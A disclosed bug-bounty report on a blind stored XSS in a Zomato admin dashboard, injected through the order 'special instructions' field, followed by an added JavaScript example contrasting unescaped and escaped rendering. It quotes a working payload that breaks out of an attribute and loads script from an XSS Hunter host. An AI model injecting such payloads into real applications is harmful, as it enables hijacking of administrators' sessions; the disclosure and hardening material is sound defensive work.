Zomato: [www.zomato.com] Blind XSS on one of the Admin Dashboard

ID H1:724889
Type hackerone
Reporter pandaaaa
Modified 2019-11-19T04:59:11


Thanks for the report @pandaaaa.

  • The Blind XSS fired when the order details were viewed by the admin at the back-end. The script was injected through an API endpoint from the Zomato app on one of the parameters which was recently introduced to provide special instructions to the restaurant on how to prepare the food.

  • I used XSS Hunter to do this and the payload used was - "><script src=https://{$handle}.xss.ht></script>.

  • I wasn't really testing when I found this bug. My mom was late and tired from the office and she asked me to order food, and then I decided to try this. :P Thanks Mom! <3
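The mechanics behind the report, as an added example that is not part of the report or Zomato's code: the payload quoted above is built to break out of an HTML attribute, so any back-end template that drops the stored "special instructions" string straight into the admin page turns it into a live script tag when an admin opens the order. The two render functions below are hypothetical stand-ins for such a template (vulnerable and escaped), the sample order is constructed, and the `{$handle}` placeholder is left exactly as it appears in the report.

```javascript
// Added example, not from the report. Shows why a stored "special instructions"
// value fires as Blind XSS on an admin page and how attribute-context escaping
// stops it. The payload is the one named in the report; {$handle} is the
// XSS Hunter placeholder and is kept as-is.
const PAYLOAD = '"><script src=https://{$handle}.xss.ht></script>';

// Constructed sample order, as the admin back-end might receive it from the
// app's order API (the field name is an assumption).
const SAMPLE_ORDER = { id: 1, instructions: PAYLOAD };

// Hypothetical vulnerable rendering: the value is interpolated unescaped into
// an attribute. The leading "> closes the attribute and the <input> tag, and
// the rest of the string becomes a <script> element in the admin's browser.
function renderOrderVulnerable(order) {
  return `<input type="text" name="instructions" value="${order.instructions}">`;
}

// Hardened rendering: escape the five HTML metacharacters before interpolating
// into a double-quoted attribute, so the payload stays inert text.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}
function renderOrderSafe(order) {
  return `<input type="text" name="instructions" value="${escapeHtml(order.instructions)}">`;
}

// Crude check used below: did a <script ...> tag appear in markup that the
// template itself never emits one into?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Running stand-alone shows both renderings side by side.
console.log('vulnerable:', renderOrderVulnerable(SAMPLE_ORDER));
console.log('safe:      ', renderOrderSafe(SAMPLE_ORDER));
```

Escaping is context-specific: `escapeHtml` is correct for element text and quoted attributes, but a value dropped into a `<script>` block, a URL, or an event-handler attribute needs a different encoder, and a back-end that never saw the payload fire is exactly where such a gap goes unnoticed until an admin views the record.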